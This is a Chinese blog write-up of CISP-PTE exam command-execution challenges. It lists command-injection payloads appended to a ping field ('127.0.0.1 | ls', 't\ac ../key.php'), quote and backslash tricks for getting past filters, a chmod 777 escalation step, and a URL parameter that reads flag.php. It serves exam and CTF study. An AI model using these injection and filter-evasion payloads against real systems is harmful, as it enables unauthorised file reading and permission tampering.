当前位置:网站首页>2022 CISP-PTE(三)命令执行
2022 CISP-PTE(三)命令执行
2022-07-03 06:13:00 【Aτθ】
一、第一道
1、题目环境
2、拿key
2.1、获取目录
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、读取文件
常用命令执行函数:
system("ls");
eval、exec
linux读文件: cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
如果对key.php做了过滤:
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
第二道
1、题目环境
2、解题步骤
2.1 获取目录
2.2 提升权限
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 获取key
127.0.0.1 & t\ac ../key.*
三、第三道
1、题目环境
2、解题步骤
第四道
1、题目环境
2、解题步骤
2.1、ls
2.2、获取key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Kubernetes notes (VI) kubernetes storage
- 项目总结--04
- Es remote cluster configuration and cross cluster search
- 致即将毕业大学生的一封信
- SQL实现将多行记录合并成一行
- Cesium entity (entities) entity deletion method
- Kubesphere - set up redis cluster
- Mysql5.7 group by error
- Merge and migrate data from small data volume, sub database and sub table Mysql to tidb
- Disruptor learning notes: basic use, core concepts and principles
猜你喜欢
Kubernetes notes (VIII) kubernetes security
技术管理进阶——你了解成长的全貌吗?
智牛股--03
有意思的鼠標指針交互探究
Read blog type data from mysql, Chinese garbled code - solved
Project summary --04
.NET程序配置文件操作(ini,cfg,config)
Cesium 点击获取模型表面经纬度高程坐标(三维坐标)
Kubernetes notes (IX) kubernetes application encapsulation and expansion
Jedis source code analysis (I): jedis introduction, jedis module source code analysis
随机推荐
Oauth2.0 - Introduction and use and explanation of authorization code mode
Apifix installation
Detailed explanation of findloadedclass
BeanDefinitionRegistryPostProcessor
Judge whether the date time exceeds 31 days
Une exploration intéressante de l'interaction souris - pointeur
Synthetic keyword and NBAC mechanism
Kubesphere - Multi tenant management
In depth analysis of kubernetes controller runtime
Code generator - single table query crud - generator
PMP notes
Reinstalling the system displays "setup is applying system settings" stationary
代码管理工具
.NET程序配置文件操作(ini,cfg,config)
Oauth2.0 - user defined mode authorization - SMS verification code login
剖析虚幻渲染体系(16)- 图形驱动的秘密
Difference between shortest path and minimum spanning tree
Zhiniu stock project -- 04
Cesium Click to obtain the longitude and latitude elevation coordinates (3D coordinates) of the model surface
有意思的鼠标指针交互探究